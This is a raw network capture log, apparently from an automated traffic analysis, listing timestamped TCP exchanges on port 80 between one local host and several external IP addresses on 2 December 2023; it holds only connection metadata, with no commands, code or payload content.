                                                                        Dec 2, 2023 18:50:02.960751057 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.960764885 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.960799932 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.960983038 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.960997105 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.961035013 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.961414099 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.961429119 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.961483002 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.961689949 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.961705923 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.961743116 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.961982965 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.961997986 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.962054014 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.962332964 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.962347031 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.962395906 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.962681055 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.962694883 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.962745905 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.963006973 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.963018894 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.963056087 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.963376999 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.963391066 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.963429928 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.963824034 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.963870049 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.963908911 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.963996887 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.964010000 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.964045048 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.964368105 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.964381933 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.964416981 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.964768887 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.964782953 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.964819908 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.965064049 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.965076923 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.965118885 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.965377092 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.965392113 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.965425014 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.965765953 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.965780020 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.965826035 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.966098070 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.966110945 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.966154099 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.966408014 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.966423035 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.966460943 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.966754913 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.966768980 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.966809034 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.967056036 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.967071056 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.967111111 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.967432976 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.967681885 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.967696905 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.967721939 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.968023062 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.968036890 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.968060970 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.968445063 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.968461037 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.968476057 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.968485117 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.968519926 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.968838930 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.968854904 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.968894005 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:02.969125986 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.969142914 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:02.969274044 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:03.175910950 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:03.175941944 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:03.176047087 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:03.176537037 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:03.176553011 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:03.176610947 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:03.176762104 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:03.176775932 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:03.176814079 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:03.177041054 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:03.177056074 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:03.177108049 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:03.177469015 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:03.177484035 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:03.177551031 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:03.177978992 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:03.178011894 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:03.178047895 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:03.178291082 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:03.178304911 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:03.178340912 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:03.178716898 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:03.178730965 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:03.178761959 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:03.179202080 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:03.179217100 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:03.179267883 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:03.179644108 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:03.179660082 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:03.179704905 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:03.180047035 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:03.180061102 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:03.180130959 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:03.180450916 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:03.180466890 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:03.180527925 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:03.181747913 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:03.181770086 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:03.181935072 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:03.183063984 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:03.183211088 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:03.183397055 CET4972480192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:50:03.403397083 CET804972437.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:50:08.604801893 CET4972580192.168.2.10131.153.147.90
                                                                        Dec 2, 2023 18:50:08.703224897 CET8049725131.153.147.90192.168.2.10
                                                                        Dec 2, 2023 18:50:08.703331947 CET4972580192.168.2.10131.153.147.90
                                                                        Dec 2, 2023 18:50:08.703560114 CET4972580192.168.2.10131.153.147.90
                                                                        Dec 2, 2023 18:50:08.801914930 CET8049725131.153.147.90192.168.2.10
                                                                        Dec 2, 2023 18:50:08.807337999 CET8049725131.153.147.90192.168.2.10
                                                                        Dec 2, 2023 18:50:08.807370901 CET8049725131.153.147.90192.168.2.10
                                                                        Dec 2, 2023 18:50:08.807481050 CET4972580192.168.2.10131.153.147.90
                                                                        Dec 2, 2023 18:50:10.211580038 CET4972580192.168.2.10131.153.147.90
                                                                        Dec 2, 2023 18:50:11.228039026 CET4972680192.168.2.10131.153.147.90
                                                                        Dec 2, 2023 18:50:11.328572989 CET8049726131.153.147.90192.168.2.10
                                                                        Dec 2, 2023 18:50:11.328704119 CET4972680192.168.2.10131.153.147.90
                                                                        Dec 2, 2023 18:50:11.329054117 CET4972680192.168.2.10131.153.147.90
                                                                        Dec 2, 2023 18:50:11.427459955 CET8049726131.153.147.90192.168.2.10
                                                                        Dec 2, 2023 18:50:11.433995008 CET8049726131.153.147.90192.168.2.10
                                                                        Dec 2, 2023 18:50:11.434123993 CET8049726131.153.147.90192.168.2.10
                                                                        Dec 2, 2023 18:50:11.434170961 CET4972680192.168.2.10131.153.147.90
                                                                        Dec 2, 2023 18:50:12.836494923 CET4972680192.168.2.10131.153.147.90
                                                                        Dec 2, 2023 18:50:13.852564096 CET4972780192.168.2.10131.153.147.90
                                                                        Dec 2, 2023 18:50:13.951141119 CET8049727131.153.147.90192.168.2.10
                                                                        Dec 2, 2023 18:50:13.951370001 CET4972780192.168.2.10131.153.147.90
                                                                        Dec 2, 2023 18:50:13.951523066 CET4972780192.168.2.10131.153.147.90
                                                                        Dec 2, 2023 18:50:14.049905062 CET8049727131.153.147.90192.168.2.10
                                                                        Dec 2, 2023 18:50:14.057214975 CET8049727131.153.147.90192.168.2.10
                                                                        Dec 2, 2023 18:50:14.057249069 CET8049727131.153.147.90192.168.2.10
                                                                        Dec 2, 2023 18:50:14.057737112 CET4972780192.168.2.10131.153.147.90
                                                                        Dec 2, 2023 18:50:15.461462021 CET4972780192.168.2.10131.153.147.90
                                                                        Dec 2, 2023 18:50:16.477670908 CET4972880192.168.2.10131.153.147.90
                                                                        Dec 2, 2023 18:50:16.577413082 CET8049728131.153.147.90192.168.2.10
                                                                        Dec 2, 2023 18:50:16.577518940 CET4972880192.168.2.10131.153.147.90
                                                                        Dec 2, 2023 18:50:16.788357019 CET4972880192.168.2.10131.153.147.90
                                                                        Dec 2, 2023 18:50:16.887137890 CET8049728131.153.147.90192.168.2.10
                                                                        Dec 2, 2023 18:50:16.890762091 CET8049728131.153.147.90192.168.2.10
                                                                        Dec 2, 2023 18:50:16.890785933 CET8049728131.153.147.90192.168.2.10
                                                                        Dec 2, 2023 18:50:16.890935898 CET4972880192.168.2.10131.153.147.90
                                                                        Dec 2, 2023 18:50:16.891069889 CET4972880192.168.2.10131.153.147.90
                                                                        Dec 2, 2023 18:50:16.991110086 CET8049728131.153.147.90192.168.2.10
                                                                        Dec 2, 2023 18:50:22.195511103 CET4972980192.168.2.1094.23.162.163
                                                                        Dec 2, 2023 18:50:22.376619101 CET804972994.23.162.163192.168.2.10
                                                                        Dec 2, 2023 18:50:22.376740932 CET4972980192.168.2.1094.23.162.163
                                                                        Dec 2, 2023 18:50:22.377563953 CET4972980192.168.2.1094.23.162.163
                                                                        Dec 2, 2023 18:50:22.559967041 CET804972994.23.162.163192.168.2.10
                                                                        Dec 2, 2023 18:50:22.559993982 CET804972994.23.162.163192.168.2.10
                                                                        Dec 2, 2023 18:50:22.560031891 CET4972980192.168.2.1094.23.162.163
                                                                        Dec 2, 2023 18:50:23.883347988 CET4972980192.168.2.1094.23.162.163
                                                                        Dec 2, 2023 18:50:24.064454079 CET804972994.23.162.163192.168.2.10
                                                                        Dec 2, 2023 18:50:24.900053024 CET4973080192.168.2.1094.23.162.163
                                                                        Dec 2, 2023 18:50:25.074027061 CET804973094.23.162.163192.168.2.10
                                                                        Dec 2, 2023 18:50:25.074117899 CET4973080192.168.2.1094.23.162.163
                                                                        Dec 2, 2023 18:50:25.074394941 CET4973080192.168.2.1094.23.162.163
                                                                        Dec 2, 2023 18:50:25.248140097 CET804973094.23.162.163192.168.2.10
                                                                        Dec 2, 2023 18:50:25.248171091 CET804973094.23.162.163192.168.2.10
                                                                        Dec 2, 2023 18:50:25.248289108 CET4973080192.168.2.1094.23.162.163
                                                                        Dec 2, 2023 18:50:26.586488962 CET4973080192.168.2.1094.23.162.163
                                                                        Dec 2, 2023 18:50:26.760653973 CET804973094.23.162.163192.168.2.10
                                                                        Dec 2, 2023 18:50:27.602555037 CET4973180192.168.2.1094.23.162.163
                                                                        Dec 2, 2023 18:50:27.782090902 CET804973194.23.162.163192.168.2.10
                                                                        Dec 2, 2023 18:50:27.782210112 CET4973180192.168.2.1094.23.162.163
                                                                        Dec 2, 2023 18:50:27.782480001 CET4973180192.168.2.1094.23.162.163
                                                                        Dec 2, 2023 18:50:27.961996078 CET804973194.23.162.163192.168.2.10
                                                                        Dec 2, 2023 18:50:27.962019920 CET804973194.23.162.163192.168.2.10
                                                                        Dec 2, 2023 18:50:30.305826902 CET4973280192.168.2.1094.23.162.163
                                                                        Dec 2, 2023 18:50:30.486393929 CET804973294.23.162.163192.168.2.10
                                                                        Dec 2, 2023 18:50:30.486756086 CET4973280192.168.2.1094.23.162.163
                                                                        Dec 2, 2023 18:50:30.486798048 CET4973280192.168.2.1094.23.162.163
                                                                        Dec 2, 2023 18:50:30.667026043 CET804973294.23.162.163192.168.2.10
                                                                        Dec 2, 2023 18:50:30.667097092 CET804973294.23.162.163192.168.2.10
                                                                        Dec 2, 2023 18:50:30.667105913 CET804973294.23.162.163192.168.2.10
                                                                        Dec 2, 2023 18:50:30.667537928 CET4973280192.168.2.1094.23.162.163
                                                                        Dec 2, 2023 18:50:30.670994043 CET4973280192.168.2.1094.23.162.163
                                                                        Dec 2, 2023 18:50:30.850904942 CET804973294.23.162.163192.168.2.10
                                                                        Dec 2, 2023 18:50:36.376173019 CET4973380192.168.2.1066.29.155.54
                                                                        Dec 2, 2023 18:50:36.541548014 CET804973366.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:36.541682005 CET4973380192.168.2.1066.29.155.54
                                                                        Dec 2, 2023 18:50:36.541908979 CET4973380192.168.2.1066.29.155.54
                                                                        Dec 2, 2023 18:50:36.705174923 CET804973366.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:36.837861061 CET804973366.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:36.837913990 CET804973366.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:36.837939024 CET804973366.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:36.837961912 CET4973380192.168.2.1066.29.155.54
                                                                        Dec 2, 2023 18:50:36.837966919 CET804973366.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:36.838015079 CET4973380192.168.2.1066.29.155.54
                                                                        Dec 2, 2023 18:50:36.838129997 CET804973366.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:36.838169098 CET4973380192.168.2.1066.29.155.54
                                                                        Dec 2, 2023 18:50:38.055254936 CET4973380192.168.2.1066.29.155.54
                                                                        Dec 2, 2023 18:50:39.072127104 CET4973480192.168.2.1066.29.155.54
                                                                        Dec 2, 2023 18:50:39.244560957 CET804973466.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:39.244703054 CET4973480192.168.2.1066.29.155.54
                                                                        Dec 2, 2023 18:50:39.244920969 CET4973480192.168.2.1066.29.155.54
                                                                        Dec 2, 2023 18:50:39.415693998 CET804973466.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:39.526721954 CET804973466.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:39.526768923 CET804973466.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:39.526817083 CET804973466.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:39.526849985 CET804973466.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:39.526887894 CET4973480192.168.2.1066.29.155.54
                                                                        Dec 2, 2023 18:50:39.526940107 CET4973480192.168.2.1066.29.155.54
                                                                        Dec 2, 2023 18:50:39.526947021 CET804973466.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:39.527046919 CET4973480192.168.2.1066.29.155.54
                                                                        Dec 2, 2023 18:50:40.758299112 CET4973480192.168.2.1066.29.155.54
                                                                        Dec 2, 2023 18:50:41.774538040 CET4973580192.168.2.1066.29.155.54
                                                                        Dec 2, 2023 18:50:41.946923971 CET804973566.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:41.947030067 CET4973580192.168.2.1066.29.155.54
                                                                        Dec 2, 2023 18:50:41.947314978 CET4973580192.168.2.1066.29.155.54
                                                                        Dec 2, 2023 18:50:42.119148016 CET804973566.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:42.226286888 CET804973566.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:42.226311922 CET804973566.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:42.226325035 CET804973566.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:42.226340055 CET804973566.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:42.226381063 CET4973580192.168.2.1066.29.155.54
                                                                        Dec 2, 2023 18:50:42.226483107 CET804973566.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:42.226511955 CET4973580192.168.2.1066.29.155.54
                                                                        Dec 2, 2023 18:50:42.226521015 CET4973580192.168.2.1066.29.155.54
                                                                        Dec 2, 2023 18:50:43.461566925 CET4973580192.168.2.1066.29.155.54
                                                                        Dec 2, 2023 18:50:44.477591991 CET4973680192.168.2.1066.29.155.54
                                                                        Dec 2, 2023 18:50:44.641634941 CET804973666.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:44.641944885 CET4973680192.168.2.1066.29.155.54
                                                                        Dec 2, 2023 18:50:44.642169952 CET4973680192.168.2.1066.29.155.54
                                                                        Dec 2, 2023 18:50:44.808486938 CET804973666.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:44.924726009 CET804973666.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:44.924746990 CET804973666.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:44.924758911 CET804973666.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:44.924772024 CET804973666.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:44.924784899 CET804973666.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:44.924863100 CET4973680192.168.2.1066.29.155.54
                                                                        Dec 2, 2023 18:50:44.924896002 CET4973680192.168.2.1066.29.155.54
                                                                        Dec 2, 2023 18:50:44.925173044 CET4973680192.168.2.1066.29.155.54
                                                                        Dec 2, 2023 18:50:45.088617086 CET804973666.29.155.54192.168.2.10
                                                                        Dec 2, 2023 18:50:51.064507961 CET4973780192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:51.165172100 CET804973734.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:51.165435076 CET4973780192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:51.165658951 CET4973780192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:51.264899969 CET804973734.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:51.452313900 CET804973734.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:51.455029964 CET804973734.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:51.455068111 CET804973734.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:51.455092907 CET4973780192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:51.455136061 CET4973780192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:52.680291891 CET4973780192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:53.696110010 CET4973880192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:53.795315027 CET804973834.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:53.795418024 CET4973880192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:53.795634985 CET4973880192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:53.896255970 CET804973834.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:54.082504034 CET804973834.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:54.085484982 CET804973834.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:54.085602999 CET804973834.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:54.085629940 CET4973880192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:54.085652113 CET4973880192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:55.305967093 CET4973880192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:56.321233034 CET4973980192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:56.420639038 CET804973934.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:56.420893908 CET4973980192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:56.421829939 CET4973980192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:56.521075010 CET804973934.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:56.521106005 CET804973934.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:56.708125114 CET804973934.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:56.711246014 CET804973934.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:56.711287022 CET804973934.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:56.711335897 CET4973980192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:56.711390972 CET4973980192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:57.930401087 CET4973980192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:58.946628094 CET4974080192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:59.045460939 CET804974034.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:59.045614958 CET4974080192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:59.045965910 CET4974080192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:59.144642115 CET804974034.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:59.332140923 CET804974034.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:59.345099926 CET804974034.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:59.345117092 CET804974034.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:59.345129967 CET804974034.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:59.345143080 CET804974034.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:59.345155001 CET804974034.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:59.345165968 CET804974034.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:50:59.345166922 CET4974080192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:59.345235109 CET4974080192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:59.345269918 CET4974080192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:59.345500946 CET4974080192.168.2.1034.149.198.43
                                                                        Dec 2, 2023 18:50:59.444411039 CET804974034.149.198.43192.168.2.10
                                                                        Dec 2, 2023 18:51:04.649286985 CET4974180192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:04.849555016 CET804974181.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:04.849684954 CET4974180192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:04.850024939 CET4974180192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:05.050493002 CET804974181.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:05.052381992 CET804974181.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:05.052422047 CET804974181.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:05.052515030 CET4974180192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:06.352212906 CET4974180192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:07.466618061 CET4974280192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:07.671005964 CET804974281.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:07.671163082 CET4974280192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:08.962429047 CET4974280192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:09.166683912 CET804974281.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:09.168382883 CET804974281.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:09.168411016 CET804974281.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:09.168499947 CET4974280192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:10.477155924 CET4974280192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:11.493082047 CET4974380192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:11.697715044 CET804974381.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:11.697828054 CET4974380192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:11.698075056 CET4974380192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:11.902755022 CET804974381.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:11.903847933 CET804974381.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:11.903867960 CET804974381.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:11.903975010 CET4974380192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:13.211555004 CET4974380192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:14.227427959 CET4974480192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:14.431751013 CET804974481.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:14.431845903 CET4974480192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:14.432070971 CET4974480192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:14.637274027 CET804974481.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:14.637300014 CET804974481.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:14.637312889 CET804974481.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:14.637531996 CET4974480192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:14.638317108 CET4974480192.168.2.1081.169.145.70
                                                                        Dec 2, 2023 18:51:14.842631102 CET804974481.169.145.70192.168.2.10
                                                                        Dec 2, 2023 18:51:20.231798887 CET4974580192.168.2.1085.159.66.93
